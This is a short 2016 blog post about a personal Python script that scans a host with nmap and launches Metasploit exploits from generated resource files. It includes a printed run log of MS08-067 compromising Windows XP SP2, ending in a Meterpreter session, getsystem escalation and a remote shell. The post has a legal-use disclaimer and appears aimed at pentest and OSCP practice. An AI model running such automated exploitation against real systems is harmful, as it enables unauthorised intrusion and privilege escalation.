niedziela, 7 sierpnia 2016

Small script for Metasploit in Kali

During last pentest I was wondering how can I automate few tasks. Idea is based on...

... the code I wrote few days ago as a (skeleton for) "proof-of-concept".

Now I decide to extend it a little bit, and rewrite the whole code (I assumed it will be a good
exercise for learning python, because I'm not a programmer:) So...).

TL;DR - on my github you will find the code.

Idea was to not create another super-python-security-scanner but to create a small tool
to run against host/IP and get a shell if possible. Below you will find old example for
vulnerable Windows XP SP2:

 [i] Checking target directory: /home/c/src/grabash/logs/
[+] Log directory for target is already created.
[i] Preparing RC files:
[+] Network RC file created at : /home/c/src/grabash/logs/
[+] HTTP RC file created at : /home/c/src/grabash/logs/
[+] Reading scan log...
[i] MS-DC Active Directory found on port:  445
    + loading : 445 modules...
[i] Reding log file : done.
[i] Starting Metasploit with RC file :  /home/c/src/grabash/logs/
Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ Free Metasploit Pro trial: ]

[*] Processing /home/c/src/grabash/logs/ for ERB directives.
resource (/home/c/src/grabash/logs/> spool /home/c/src/grabash/logs/
[*] Spooling to file /home/c/src/grabash/logs/
resource (/home/c/src/grabash/logs/> use exploit/windows/smb/ms08_067_netapi
resource (/home/c/src/grabash/logs/> set RHOST
resource (/home/c/src/grabash/logs/> run
[*] Started reverse TCP handler on
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Polish
[*] Selected Target: Windows XP SP2 Polish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-08-07 02:25:09 -0400
meterpreter > getsystem system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 500 created.
Channel 1 created.
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>net view
net view

As you can see, script started nmap and save the output to log. 'grep' the log for
'open' port(s) and you will have a list of services on remote machine.

Now idea is to get information from the log scan to prepare useful attacks from Metasploit
and save the list of them (read: possible attacks) to RC file. Last step: run msf with RC file.

Some example output for few tests if we'll find Joomla:

As you will see during your (free) Metasploit adventures, few modules are not working "correctly".
(Maybe it's related to my settings, maybe not, anyway...) Skeleton of is really simple.
If you know Ruby (or Metasploit), you can extend it and prepare more modules for your own pentests. 

In case of any questions, feel free to ask.

Remember to use the code only:
- on your environment
- only for legal purpose
- not on the 'production' 

Remember (and understand) that the modules used inside this code,
can result in a damage or 'blue screens'.

Use it on your own risk.

Maybe you will find it useful (to pass the OSCP ;) )


Brak komentarzy:

Prześlij komentarz